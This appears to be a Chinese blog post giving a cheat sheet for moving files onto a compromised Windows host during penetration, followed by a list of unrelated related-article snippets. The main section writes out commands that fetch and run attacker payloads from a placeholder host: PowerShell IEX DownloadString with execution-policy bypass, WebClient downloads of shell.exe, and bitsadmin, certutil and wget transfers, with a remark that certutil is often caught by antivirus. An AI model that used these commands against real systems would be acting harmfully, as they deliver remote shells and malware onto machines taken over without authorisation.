渗透中的文件上传与下载

2024-09-06 01:36
文章标签 下载 渗透 上传

本文主要是介绍渗透中的文件上传与下载,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

有时候拿下一台机器的控制权,需要在这台主机上传一些东西;有时候也会碰到不能直接上传只能通过命令行执行的shell,这就需要将shell下载下来。

目录

利用powershell进行文件上传下载

利用bitsadmin命令进行文件下载

利用certutil命令上传下载文件

利用wget命令上传下载文件


利用powershell进行文件上传下载

# 下载脚本并在内存中执行
powershell -nop -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/xxx.ps1')"  # 下载文件到指定目录
powershell (new-object system.net.webclient).downloadfile('http://xxx.xxx.xxx.xxx/shell.exe','d:/test.exe')# 下载文件到当前目录
powershell (new-object system.net.webclient).downloadfile('http://xxx.xxx.xxx.xxx/test.exe','test.exe')

利用bitsadmin命令进行文件下载

bitsadmin是Windows自带工具(Windows7之后),可以用来进行文件下载,Windows的自动更新和补丁之类下载就是用这个工具来实现的。而且bitsadmin可以在网络不稳定的状态下下载文件,出错会自动重新加载重试。

如下命令,将位于外网文件下载到目标主机上

bitsadmin /transfer <任务名> <remote_url> <local_name>bitsadmin /transfer shell http://xxx.xxx.xxx.xxx/shell.exe c:\users\tester\shell.exe    // 保存文件的文件路径必须是已经存在的有权限的目录,否则不能下载。

加载速度过慢也可以设置任务优先级

先执行:
start bitsadmin /transfer <任务名> http://xxx.xxx.xxx.xxx/shell.exe c:\users\tester\shell1.exe
再执行:
bitsadmin /setpriority <对应任务名> foreground

利用certutil命令上传下载文件

在Windows7及其以后的机器都可以使用,但该命令容易被杀软查杀。

certutil -urlcache -split -f http://xxx.xxx.xxx.xxx/shell.exe c:/users/tester/shell.exe // 下载文件到指定目录下

利用wget命令上传下载文件

wget -O c:/users/tester/shell.exe http://xxx.xxx.xxx.xxx/shell.exe // 下载文件到指定目录并指定了文件
wget -P c:/users/tester/ http://xxx.xxx.xxx.xxx/shell.exe // 下载文件到指定目录下

这篇关于渗透中的文件上传与下载的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1140628

相关文章

常用的jdk下载地址

jdk下载地址 安装方式可以看之前的博客: mac安装jdk oracle 版本:https://www.oracle.com/java/technologies/downloads/ Eclipse Temurin版本:https://adoptium.net/zh-CN/temurin/releases/ 阿里版本: github:https://github.com/

2. 下载rknn-toolkit2项目

官网链接: https://github.com/airockchip/rknn-toolkit2 安装好git:[[1. Git的安装]] 下载项目: git clone https://github.com/airockchip/rknn-toolkit2.git 或者直接去github下载压缩文件,解压即可。

Spring MVC 图片上传

引入需要的包 <dependency><groupId>commons-logging</groupId><artifactId>commons-logging</artifactId><version>1.1</version></dependency><dependency><groupId>commons-io</groupId><artifactId>commons-

前端form表单+ifarme方式实现大文件下载

// main.jsimport Vue from 'vue';import App from './App.vue';import { downloadTokenFile } from '@/path/to/your/function'; // 替换为您的函数路径// 将 downloadTokenFile 添加到 Vue 原型上Vue.prototype.$downloadTokenF

【干货分享】基于SSM的体育场管理系统的开题报告(附源码下载地址)

中秋送好礼 中秋佳节将至,祝福大家中秋快乐,阖家幸福。本期免费分享毕业设计作品:《基于SSM的体育场管理系统》。 基于SSM的体育场管理系统的开题报告 一、课题背景与意义 随着全民健身理念的深入人心,体育场已成为广大师生和社区居民进行体育锻炼的重要场所。然而,传统的体育场管理方式存在诸多问题,如资源分配不均、预约流程繁琐、数据统计不准确等,严重影响了体育场的使用效率和用户体验。

在SSH的基础上使用jquery.uploadify.js上传文件

在SSH框架的基础上,使用jquery.uploadify.js实现文件的上传,之前搞了好几天,都上传不了, 在Action那边File接收到的总是为null, 为了这个还上网搜了好多相关的信息,但都不行,最后还是搜到一篇文章帮助到我了,希望能帮助到为之困扰的人。 jsp页面的关键代码: <link rel="stylesheet" type="text/css" href="${page

Tomcat下载压缩包解压后应有如下文件结构

1、bin:存放启动和关闭Tomcat的命令的路径。 2、conf:存放Tomcat的配置,所有的Tomcat的配置都在该路径下设置。 3、lib:存放Tomcat服务器的核心类库(JAR文件),如果需要扩展Tomcat功能,也可将第三方类库复制到该路径下。 4、logs:这是一个空路径,该路径用于保存Tomcat每次运行后产生的日志。 5、temp:保存Web应用运行过程中生成的临时文件

下载/保存/读取 文件,并转成流输出

最近对文件的操作又熟悉了下;现在记载下来:学习在于 坚持!!!不以细小而不为。 实现的是:文件的下载、文件的保存到SD卡、文件的读取输出String 类型、最后是文件转换成流输出;一整套够用了; 重点: 1:   操作网络要记得开线程; 2:更新网络获取的数据 切记用Handler机制; 3:注意代码的可读性(这里面只是保存到SD卡,在项目中切记要对SD卡的有无做判断,然后再获取路径!)

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

Vue3上传图片报错:Current request is not a multipart request

当你看到错误 "Current request is not a multipart request" 时,这通常意味着你的服务器或后端代码期望接收一个 multipart/form-data 类型的请求,但实际上并没有收到这样的请求。在使用 <el-upload> 组件时,如果你已经设置了 http-request 属性来自定义上传行为,并且遇到了这个错误,可能是因为你在发送请求时没有正确地设置